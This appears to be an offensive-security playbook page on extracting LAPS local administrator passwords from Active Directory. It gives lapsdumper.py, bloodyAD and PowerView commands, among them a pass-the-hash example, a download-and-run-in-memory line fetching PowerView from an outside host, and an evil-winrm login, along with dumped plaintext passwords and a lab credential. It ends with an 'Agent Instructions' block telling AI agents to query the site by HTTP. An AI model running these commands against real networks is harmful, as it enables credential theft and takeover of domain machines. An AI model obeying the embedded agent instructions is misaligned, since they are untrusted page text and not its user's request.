# LAPS * Dump laps passwords if you have a user account with the rights to dump the laps passwords * Enumerate users that can read the laps passwords with bloodhound ### lapsdumper.py Usage: Basic: `$ python laps.py -u user -p password -d domain.local` Pass the Hash, specific LDAP server: `$ python laps.py -u user -p e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c -d domain.local -l dc01.domain.local` ### bloodyAD If BloodHound shows the user can read LAPS passwords, query `ms-Mcs-AdmPwd` and `ms-Mcs-AdmPwdExpirationTime` directly: ```bash bloodyAD --host DC_IP -d domain.local -u user -p 'PASSWORD' \ get search \ --filter '(ms-mcs-admpwdexpirationtime=*)' \ --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime ``` Example output: ``` distinguishedName: CN=DC01,OU=Domain Controllers,DC=domain,DC=local ms-Mcs-AdmPwd: V,!31D;3&M+2h. ms-Mcs-AdmPwdExpirationTime: 134260119643091883 ``` Use the recovered local Administrator password with WinRM if the target permits it: ```bash evil-winrm -i DC_IP -u Administrator -p 'V,!31D;3&M+2h.' ``` ``` (new-object system.net.webclient).downloadstring('http://10.10.15.45/PowerView.ps1') | IEX $SecPassword = ConvertTo-SecureString 'J5KCwKruINyCJBKd1dZU' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('RLAB\ngodfrey_adm',$SecPassword) Get-DomainComputer ws01,ws02,ws03,ws04,ws05,ws06 -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime -Credential $Cred Get-DomainComputer ws02 -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime -Credential $Cred ms-mcs-admpwdexpirationtime ms-mcs-admpwd --------------------------- ------------- ws01 133185858282921848 7Z74HKx6 ws02 133185858955408843 Khb3SL8p ws03 133185859531299786 t25KAW60 ws04 133185860137129767 l0Q7i5Xd ws05 133185860845564372 bzsn82zX ws06 133185861369786402 vPKNz69a ``` ### Powerview Dump * Download Powersploit ``` https://github.com/PowerShellMafia/PowerSploit/tree/dev ``` * zip the dir up and transfer the whole thing to target * expand on target with `expand-archive` ``` import-module .\PowerSploit.psd1 --or-- (new-object system.net.webclient).downloadstring('http://10.10.15.45/PowerView.ps1') | IEX #now it is loaded into mem either with IEX or with the import-module $SecPassword = ConvertTo-SecureString 'PASSWORD_HERE' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('RLAB\ngodfrey_adm',$SecPassword) Get-DomainComputer ws01,ws02,ws03,ws04,ws05,ws06 -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime -Credential $Cred Get-DomainComputer ws02 -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime -Credential $Cred ms-mcs-admpwdexpirationtime ms-mcs-admpwd --------------------------- ------------- ws01 133185858282921848 7Z74HKx6 ws02 133185858955408843 Khb3SL8p ws03 133185859531299786 t25KAW60 ws04 133185860137129767 l0Q7i5Xd ws05 133185860845564372 bzsn82zX ws06 133185861369786402 vPKNz69a ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://book.ice-wzl.xyz/domain-controllers/lapsdumper.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.